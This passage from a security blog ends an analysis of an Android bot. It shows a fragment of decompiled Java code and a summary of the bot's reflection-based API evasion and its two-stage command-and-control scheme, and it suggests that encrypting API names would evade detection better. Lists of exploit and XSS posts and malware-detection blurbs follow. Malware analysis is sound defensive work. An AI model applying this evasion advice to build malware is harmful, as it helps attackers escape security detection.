paramContext.startActivity(localIntent);
}
public static boolean sendSms(String paramString1, String paramString2)
{
return false;
}
}
总结:这款android bot的特点有两个,一个是大量采用了反射机制来调用函数,估计是为了规避api检测,不过不够彻底,应该采用动态解密api函数名,类名的方式更彻底。第二个是他的控制命令传递方式,采用了两级的方式,首先去指定网站获得控制命令的url,然后打开控制命令的url,根据这个url的页面js事件的参数,来调用bot控制命令,算是比较有特色的。
分享到:
发表评论
-
metasploit 图形化界面和自动化exploit脚本
2013-10-21 16:25 77590x01 最新版的metasploit没了图形化界面, ... -
APKTool签名的一个问题
2013-10-14 21:19 25180x01 昨天写了反编译,今天就写下签名的问题 0 ... -
APKTool打包的一个小问题
2013-10-13 20:23 248230x01,又开始写blog了,好久没有网络了,最近终于可以开 ... -
struts2远程执行漏洞学习(四)
2013-05-23 00:12 23410x01 最近又有了一个新的struts2漏洞,http:/ ... -
CVE-2013-1493 学习
2013-03-25 16:06 30000x01 这个又是一个java CVE,效果前几个一样, ... -
CVE-2013-0422 分析2
2013-01-11 23:47 34980x01 http://wcf1987.iteye.c ... -
CVE-2013-0422 学习
2013-01-11 16:26 41630x01 这个是这两天爆出来的,我构建了一个本地测试代码,主 ... -
CVE 2012 0507 分析
2012-12-17 16:00 35680x01 https://github.com/wche ... -
android 无权限 伪造短信
2012-11-06 09:15 35760x01 这个有是大名鼎鼎的蒋教授发现的,原理简单,有点意思 ... -
A new way to hack android app info
2012-11-06 01:04 1663最近新研究了一种android攻击手段,blog发到团队那里的 ... -
一次被黑追凶(未完待续)
2012-10-15 19:52 25100x01,某天师妹告诉我们某台服务器疑似被人干掉了,我果断远程 ... -
python 反编译 pyc 一些心得
2012-09-06 10:59 538310x01 , 现在用python的人也多了起来,代码安全始终是 ... -
关于web渗透中得一些记录
2012-08-24 23:31 36161. 当得到linux root shell时 ... -
mail xss
2012-08-11 21:57 17121 最近迷上了xss,感觉各种飘逸,特别是http://www ... -
ubuntu共享文件夹设置(转)
2012-08-01 14:50 41711 sudo mount -t vboxsf samp ... -
XSS学习二
2012-07-31 15:48 12651.xss学习到今天算是告一个段落了,发现了一个sohu邮箱 ... -
我的sinaapp
2012-07-27 22:10 1276我的sinapp小家终于成型了 http://icefish ... -
phpcms v9的补充
2012-07-25 21:28 1203前一篇留了个疑问: 为什么 file_get_conten ... -
phpcms v9 爆密码
2012-07-25 20:47 70901.首先是http://www.wooyun.org/b ... -
xss漏洞及其他-学习笔记
2012-07-23 17:05 1532http://www.wooyun.org/bugs/wooy ...
相关推荐
在“Android恶意程序分析(四)”这一主题中,我们将深入探讨Android平台上的恶意软件及其分析方法。在当今数字化世界中,网络安全至关重要,尤其是对于移动设备用户而言,Android恶意程序的威胁日益增加。本文将...
在Android恶意程序检测中,textCNN模型被用来识别和分析应用程序的行为特征,从而判断其是否具有恶意行为。 首先,该方法采用了多种触发机制,目的是从不同层面诱导并暴露潜在的恶意行为。这些触发机制可以模拟用户...
【Android恶意程序常用权限分析及统计研究】 在Android操作系统中,应用权限是保障用户隐私和系统安全的关键机制。然而,一些恶意程序会滥用这些权限,对用户数据和系统造成威胁。这篇研究论文针对这一问题,深入...
手机等移动设备上存储的敏感信息越来越多,同时这些设备提供的恶意软件保护却相对有限,这直接导致了对安全专家的即时需求,这些专家需要了解如何应对Android恶意软件威胁及其分析。本文将基于《Android Malware and...
Android恶意程序检测主要通过特征码匹配和行为分析两种方式。在本系统中,检测机制首先将待检测的Android应用与特征库中的特征码进行匹配。如果应用中的特征码与特征库中的某个恶意程序特征码匹配成功,系统将直接...
Android恶意代码的逆向分析.pdf Android 恶意代码的逆向分析是当前 Android 安全领域中的一项重要研究方向。本文主要研究基于逆向工程的 Android 应用程序中恶意代码的分析方法。该方法首先通过逆向工程获取 ...
【Android恶意程序检测方法概述】 Android恶意程序检测是网络安全领域中的一个重要课题,因为随着智能手机的广泛使用,Android系统的安全问题日益突出。据统计,大约85%的手机采用Android系统,因此,确保Android...
标题中的“一种Android恶意程序检测工具的实现”指的是在Android操作系统上设计和实现一种用于检测恶意应用程序的工具。描述中提到,目前针对Android平台的恶意程序识别主要依赖静态检测,但这种方法的识别率并不高...
**Android-Droidefense: 高级的Android恶意软件分析框架** 在移动安全领域,尤其是在Android平台上,恶意软件分析是至关重要的。Android-Droidefence是一个专门为Android恶意软件设计的高级分析框架,它旨在帮助...
总的来说,这篇论文提供了一种创新的Android恶意软件检测策略,强调了结合权限和API行为的特征分析在提高检测准确性和效率方面的重要性。这对于Android应用开发者、安全研究人员以及普通用户来说,都是一个宝贵的...
总的来说,基于行为分析的Android系统恶意程序检测模型是应对当前移动安全挑战的重要手段。通过深入理解和分析程序行为,可以及时发现并阻止恶意行为,保护用户隐私和设备安全,同时也为未来的移动安全研究提供了新...
SDADLDroid是一个集成了静态和动态分析的Android恶意软件检测系统。该系统通过对应用程序静态代码特征和运行时行为特征的提取,结合深度学习技术,实现对恶意软件的识别。 知识点四:深度学习模型的选择 文章中提到...